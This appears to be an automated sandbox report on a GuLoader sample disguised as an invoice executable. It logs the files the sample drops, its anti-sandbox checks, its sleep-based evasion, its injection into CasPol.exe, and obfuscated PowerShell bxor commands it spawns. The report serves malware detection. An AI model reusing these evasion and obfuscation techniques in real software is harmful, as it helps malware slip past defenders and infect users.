Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4524:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9976:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5556:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8532:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4032:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4396:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4032:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8560:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9240:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9816:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:920:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8592:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8956:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8784:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8440:304:WilStaging_02

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: INVOICE-98656789.exe

Static file information: File size 1503236 > 1048576

Source: INVOICE-98656789.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.3247103764.0000000002F78000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 000000A7.00000002.6441525576.0000000000AE8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3245662006.0000000000849000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: INVOICE-98656789.exe PID: 9744, type: MEMORYSTR

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Code function: 0_2_70351B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_70351B28

Drops PE files

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Local\Temp\nsyC567.tmp\UserInfo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Local\Temp\nsyC567.tmp\AdvSplash.dll	Jump to dropped file
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Local\Temp\nsyC567.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Local\Temp\nsyC567.tmp\nsExec.dll	Jump to dropped file

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Electrooculograms.Ske	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Courtman.fro	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Tieback	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Tieback\Kunstgreb	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Tieback\Kunstgreb\Vesturing.Ove	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic\Eksekverbare23.bad	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic\Kemikaliedepotet.not	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic\Odinic.dri	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Hypocoristic\Remarkedly.ver	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\hmningernes	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\hmningernes\aceituna.fin	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\hmningernes\aguinaldo.kon	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\hmningernes\anagogy.hft	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Denmark	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Denmark\Selskabsdanses	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Denmark\Selskabsdanses\chefredaktrerne	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Denmark\Selskabsdanses\chefredaktrerne\Cognacsglassenes	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Denmark\Selskabsdanses\chefredaktrerne\Cognacsglassenes\beskatningsgrundlaget.fav	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\malerindens	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\malerindens\Enklest	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\malerindens\Enklest\Jebel235	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\malerindens\Enklest\Jebel235\corporacy.dep	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151\Ur	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151\Ur\Korsfstedes	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151\Ur\Korsfstedes\Angredes	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151\Ur\Korsfstedes\Angredes\diskutnjr.txt	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Baglommes151\Ur\Korsfstedes\Angredes\ornithodelphic.sto	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Miscaller	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Miscaller\skufledes.alp	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly\Ruinates	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly\Ruinates\supersensually.kal	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly\Ruinates\tibetansk.bud	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Pakningen141\Personalepolitik\Shotweld\Traktorerne\Hourly\Ruinates\zonulae.stu	Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Mass process execution to delay analysis

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x53686D28 -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F772A36 -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72352E36 -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30292272 -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A412D -bxor 607}

Tries to detect Any.run

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: INVOICE-98656789.exe, 00000000.00000002.3245662006.0000000000808000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEE\FS
Source: INVOICE-98656789.exe, 00000000.00000002.3245662006.0000000000808000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEXEQ&F
Source: INVOICE-98656789.exe, 00000000.00000002.3245584457.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488399305.0000000005E00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\INVOICE-98656789.exe TID: 9748	Thread sleep time: -43900s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1792	Thread sleep time: -270000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Last function: Thread delayed

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Window / User API: threadDelayed 439

Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Code function: 0_2_00405A0C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405A0C
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Code function: 0_2_004065DD FindFirstFileA,FindClose,	0_2_004065DD
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Code function: 0_2_004027AF FindFirstFileA,	0_2_004027AF

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	API call chain: ExitProcess graph end node

Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: INVOICE-98656789.exe, 00000000.00000002.3245662006.0000000000808000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exee\fs
